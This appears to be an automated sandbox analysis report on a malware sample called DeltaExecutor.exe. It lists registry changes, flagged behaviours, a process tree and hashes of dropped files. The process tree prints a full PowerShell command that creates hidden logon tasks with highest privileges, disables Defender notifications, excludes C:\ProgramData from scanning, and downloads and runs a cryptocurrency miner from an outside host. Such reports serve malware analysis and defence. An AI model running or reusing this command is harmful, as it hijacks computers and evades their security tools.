\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.7z\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ = "EzExtractPro Context Menu Handler" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.uue\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ = "EzExtractPro Context Menu Handler" regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" EzExtractProApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bz2\shellex regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tar\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" EzExtractProApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\NodeSlot = "9" EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "5" EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943} EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "18874433" EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" EzExtractProApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zip\shellex\ContextMenuHandlers regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" EzExtractProApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff EzExtractProApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f44471a0359723fa74489c55595fe6b30ee0000 EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 EzExtractProApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bz2 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zst\shellex\ContextMenuHandlers regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\{BDBE736F-34F5-4829-ABE8-B550E65146C4}\GroupByDirection = "1" EzExtractProApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" EzExtractProApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 EzExtractProApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zip\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.iso\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jar\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ = "EzExtractPro Context Menu Handler" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2696 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1588 EzExtractProApp.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe Token: 33 1776 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1776 AUDIODG.EXE Token: 33 1776 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1776 AUDIODG.EXE Token: SeManageVolumePrivilege 2640 SearchIndexer.exe Token: 33 2640 SearchIndexer.exe Token: SeIncBasePriorityPrivilege 2640 SearchIndexer.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2716 iexplore.exe 2716 iexplore.exe -
Suspicious use of SetWindowsHookEx 27 IoCs
pid Process 2716 iexplore.exe 2716 iexplore.exe 2444 IEXPLORE.EXE 2444 IEXPLORE.EXE 272 IEXPLORE.EXE 272 IEXPLORE.EXE 2444 IEXPLORE.EXE 2444 IEXPLORE.EXE 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 1588 EzExtractProApp.exe 2988 SearchProtocolHost.exe 2988 SearchProtocolHost.exe 2988 SearchProtocolHost.exe 2988 SearchProtocolHost.exe 2988 SearchProtocolHost.exe 2988 SearchProtocolHost.exe 2988 SearchProtocolHost.exe 2988 SearchProtocolHost.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2704 wrote to memory of 2716 2704 DeltaExecutor.exe 31 PID 2704 wrote to memory of 2716 2704 DeltaExecutor.exe 31 PID 2704 wrote to memory of 2716 2704 DeltaExecutor.exe 31 PID 2704 wrote to memory of 2696 2704 DeltaExecutor.exe 32 PID 2704 wrote to memory of 2696 2704 DeltaExecutor.exe 32 PID 2704 wrote to memory of 2696 2704 DeltaExecutor.exe 32 PID 2716 wrote to memory of 2444 2716 iexplore.exe 34 PID 2716 wrote to memory of 2444 2716 iexplore.exe 34 PID 2716 wrote to memory of 2444 2716 iexplore.exe 34 PID 2716 wrote to memory of 2444 2716 iexplore.exe 34 PID 2716 wrote to memory of 272 2716 iexplore.exe 36 PID 2716 wrote to memory of 272 2716 iexplore.exe 36 PID 2716 wrote to memory of 272 2716 iexplore.exe 36 PID 2716 wrote to memory of 272 2716 iexplore.exe 36 PID 2716 wrote to memory of 2904 2716 iexplore.exe 37 PID 2716 wrote to memory of 2904 2716 iexplore.exe 37 PID 2716 wrote to memory of 2904 2716 iexplore.exe 37 PID 2716 wrote to memory of 2904 2716 iexplore.exe 37 PID 2716 wrote to memory of 2904 2716 iexplore.exe 37 PID 2716 wrote to memory of 2904 2716 iexplore.exe 37 PID 2716 wrote to memory of 2904 2716 iexplore.exe 37 PID 2904 wrote to memory of 1072 2904 EzExtractSetup.exe 39 PID 2904 wrote to memory of 1072 2904 EzExtractSetup.exe 39 PID 2904 wrote to memory of 1072 2904 EzExtractSetup.exe 39 PID 2904 wrote to memory of 1072 2904 EzExtractSetup.exe 39 PID 2904 wrote to memory of 1072 2904 EzExtractSetup.exe 39 PID 2904 wrote to memory of 1072 2904 EzExtractSetup.exe 39 PID 2904 wrote to memory of 1072 2904 EzExtractSetup.exe 39 PID 2904 wrote to memory of 1088 2904 EzExtractSetup.exe 40 PID 2904 wrote to memory of 1088 2904 EzExtractSetup.exe 40 PID 2904 wrote to memory of 1088 2904 EzExtractSetup.exe 40 PID 2904 wrote to memory of 1088 2904 EzExtractSetup.exe 40 PID 2904 wrote to memory of 1088 2904 EzExtractSetup.exe 40 PID 2904 wrote to memory of 1088 2904 EzExtractSetup.exe 40 PID 2904 wrote to memory of 1088 2904 EzExtractSetup.exe 40 PID 1088 wrote to memory of 348 1088 regsvr32.exe 41 PID 1088 wrote to memory of 348 1088 regsvr32.exe 41 PID 1088 wrote to memory of 348 1088 regsvr32.exe 41 PID 1088 wrote to memory of 348 1088 regsvr32.exe 41 PID 1088 wrote to memory of 348 1088 regsvr32.exe 41 PID 1088 wrote to memory of 348 1088 regsvr32.exe 41 PID 1088 wrote to memory of 348 1088 regsvr32.exe 41 PID 2904 wrote to memory of 872 2904 EzExtractSetup.exe 42 PID 2904 wrote to memory of 872 2904 EzExtractSetup.exe 42 PID 2904 wrote to memory of 872 2904 EzExtractSetup.exe 42 PID 2904 wrote to memory of 872 2904 EzExtractSetup.exe 42 PID 868 wrote to memory of 1588 868 explorer.exe 44 PID 868 wrote to memory of 1588 868 explorer.exe 44 PID 868 wrote to memory of 1588 868 explorer.exe 44 PID 2640 wrote to memory of 2988 2640 SearchIndexer.exe 60 PID 2640 wrote to memory of 2988 2640 SearchIndexer.exe 60 PID 2640 wrote to memory of 2988 2640 SearchIndexer.exe 60 PID 2640 wrote to memory of 2432 2640 SearchIndexer.exe 61 PID 2640 wrote to memory of 2432 2640 SearchIndexer.exe 61 PID 2640 wrote to memory of 2432 2640 SearchIndexer.exe 61 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.exe"C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg22⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2444
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:734220 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:272
-
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\EzExtractSetup.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\EzExtractSetup.exe"3⤵
- Drops file in Program Files directory
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\EzExtractPro\EzExtractProShell32.dll"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1072
-
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\EzExtractPro\EzExtractProShell.dll"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\EzExtractPro\EzExtractProShell.dll"5⤵
- Loads dropped DLL
- Modifies registry class
PID:348
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" "C:\Program Files (x86)\EzExtractPro\EzExtractProApp.exe"4⤵PID:872
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1q7cpwxjatrtpa29u85tayvggs67f6fxwyggm8kd.ruMKXKviYa --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Program Files (x86)\EzExtractPro\EzExtractProApp.exe"C:\Program Files (x86)\EzExtractPro\EzExtractProApp.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1588
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1192
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x58c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
C:\Windows\system32\SearchIndexer.exeC:\Windows\system32\SearchIndexer.exe /Embedding1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\SearchProtocolHost.exe"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2988
-
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 508 512 520 65536 5162⤵
- Modifies data under HKEY_USERS
PID:2432
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5ede6796697abfd295b96322048642a69
SHA1d0e7aaa407c4576eee42032bf743e9194a9c21e7
SHA2566f9b0b8e8d1efbe25b81b0676a5902ec97aac1bfdc84a1a2d1b58659eb44dc5d
SHA51288daf23e91c542c7348aa5c0fd16d382ef2fa95d7d5f91a4d5e39cf5d5b361eeaf4f33fcb43a71b52e4cea20c2b9dcb2b4e909d7ca3e5ab0c6d569f672dd385f
-
Filesize
167KB
MD5968e162057c49c860813e465bfd3c2fa
SHA178e5b2e365a3cd7bd3f7fc4dfd9991568ee2ec8d
SHA25608ccd848487f570175e3c5b8fa70b04ce30e3afb9f43b4105180e2eb079c85c6
SHA5125c41164239607fd32393742943e588d461b8a1d276d9e8142929aa7a22b6f5a82a723b2fff0389ed84677cb9ea9cbf1d793a66d27c367b8f7b9909a242f94eec
-
Filesize
1024KB
MD520f9c8ffb0344040af1e38e02bcb9017
SHA1bbf2674972d87cfcebd66ce8ce20893b32423b92
SHA2562dd331449436e4783303a73a24570c7c7f5b187052bce76a8f7f75684762ce54
SHA5129ece8df37969ea1fd082953fdac7dc9a13e6b2799a4639349ab3e6655c05eb96696b38cf68b1cbaf65576933a4197283350cd99d26f305264e25c02584fb2fc1
-
Filesize
1KB
MD555540a230bdab55187a841cfe1aa1545
SHA1363e4734f757bdeb89868efe94907774a327695e
SHA256d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb
SHA512c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
Filesize2KB
MD5202c1cc2a941ce65e6628e4d3d10728a
SHA13ef8700d23bb82f2e5a3043350d9fdbe13e005c6
SHA2569153470df8ea66a9037eb771e8a4bf208fa7eed8ea4148d49121a75c9b960ed1
SHA512621a92ef02b596130e31e9fbd4929736ca943a56380a26f17a412761d09278ec32dccb534f8112729311cdc74909a42d3969994c75b8c676043e23c0a5f3c9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
Filesize1KB
MD5d5a691aff76ff11dd5df8e829ae374cd
SHA1bed64262c450b8dec06e6e3c7ee491892269dc0a
SHA256ec4648282301af36c8a5758a99e0516b40d40094f59dce7ca561a2305d3818f7
SHA5122c05e3d8f3599b4da0a72229e5e4fdc0580df04b6a70fadb389d4b672b50abe8a41bcc11cf0270ed20e4399caaed5b655767144fdbd94872f5d98665e4e20340
-
Filesize
1KB
MD5c6150925cfea5941ddc7ff2a0a506692
SHA19e99a48a9960b14926bb7f3b02e22da2b0ab7280
SHA25628689b30e4c306aab53b027b29e36ad6dd1dcf4b953994482ca84bdc1ecac996
SHA512b3bd41385d72148e03f453e76a45fcd2111a22eff3c7f1e78e41f6744735444e058144ed68af88654ee62b0f117949f35739daad6ad765b8cde1cff92ed2d00c
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
Filesize230B
MD5d0517c59dc17754cbaa7d9077e9e55d1
SHA1887ca5b706bc9bace44e8217a19bc8e2b446e2e5
SHA256b98ad498b6d37a9d6f685fbc124d758ecc91375c271bdf2d661640d49622d800
SHA512f2451d5830b2f953ed411a56d7913b26ffbf5b9e89d5d14663d21bc847d91abcd2414bec89b1d28cc922b5252da11fa4f0f7e203a94c9cd902213ba9e1c2d914
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize252B
MD5164696c79440137ecfeac77ae959b5c5
SHA1c2ace214e199ca4798b67c6f2d459ee33d938bfc
SHA256661c9b7e78c1e75580c5fe9371150e88d8ad88e6fe284414397ffcb169ca2336
SHA512b0db61ad3da31be3a236755ea565383ed86245f5bb57fd35005984172f7d2dc765fc78ee0cbc5c8dea99abc6242d13a198df5474a53c01b3c0cd35533bc25837
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD52a2eeadebbde4cd685f00131b8f73e28
SHA1ff4b51b9be8773af57413996fd8ed0ecad5c10ba
SHA256c90f292f7443b957c75a862f2fe0a64cd8d845c2cd7caadc218252e538807c28
SHA51229e419e04b104a48b41fc44348d6ff49c73c3cddbb735205ab989479a5565bf2ad843b598e65fec7300837cf0622f29777ff416a8274a08ad704876f1a7437a7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD50295f1a94bb833fe421025644dec9b01
SHA1dae1bd239bcee7301ba9f8a62babd16780f406c1
SHA256cc549bebf7464051141330b99a656a586be8a2a918c257c732d6378b2a665504
SHA51225f5b18727e9692b9376dca88e7c35cf1577afb2f2d4c36a42016b2c7aa7ee6b062ab367603b98ea0b5cc728fcfea2ea6e3ad8cd3065ba57dd0348fa8a0d7101
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54cc45f4391b7c7f14895d7796b3f8fec
SHA19d784e613f8f1b0a2dc46ca2b0ae5464a65a5126
SHA256545fcf281f95f9c69f7d6a0cf67d5ce974128be4fa74c066f6edc45d20b9004e
SHA512d01079c76e2cfe56b451b5a5c38ecda0ec65b237d2c4773f561b04ed95abc7392fcad49d94c415d3b44fcc3ad27c1742848b681a7885aef66b4dd3e6544830b0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD50f917371f19176b6743061a9e4f5a715
SHA1c876b7d39f8a8680f65b1787718d0f6e490c1c74
SHA2561f0af8b34910d6d06b6f85efba857effabfbbbe54199c5db026656d42c583d4f
SHA51245b4f905773752a82b06a528937ce0a5027870ca1d8ae7e6e624d53496bc7021884e93e9f0d0db5f5392d115c10a5b6620204c9e2b4f7008b1163cf76018c6a4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a289bdf9648cf96acbf1f38a34ddde55
SHA1c04f6221cc861d8a8d2e2211d7eb2d357b431810
SHA256a2e623a4c18c997e4b5e4be461106ad09024bb7fc2c1f45c828869cf0e7b2c6f
SHA5121cca76c4fd488a1ff54e754bd5d49bad4afafe980fb7bc20ded61aaf3a049c840ecb78c35525287015fc2436aec9d96ae7557dcebb33a921c70ef31fd200d688
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55e5b0a0592bd9ad1e351defd50e28f7a
SHA15e48113fbf8ed02ad12a73f13abc92a3c76e22d1
SHA2565ff8884a125372b27d4234fb64d850ac56a21be4ed9705699dee3f99861cf930
SHA512fa42e2293adea4b871446b3685164fa52cdf7bf688cff4aa93ff8fa18e5b972f6de1bba6fe1a5b0f8488a921c4d75d01b5ac611e7482e05dc8d58b294f2b7598
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56c40514948c1af8b3137e1c29eb0cb70
SHA1404f3afbe992a2abb2a0d19df01375119485949e
SHA2560fcd0876bf85dec8e6f74df4cc26d5598fe633f211c6f5b012050faac5cf2efb
SHA5125cae17d189db47ed1cf8448f3724b0f0cd083ab390f0f3a96a8f00b538743b4c14fbcb38a98360158923f494d598fe7980a46738a98e88e62c8d5405ffef3e2d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5d72feb45c5e19bba129f0668002d56b9
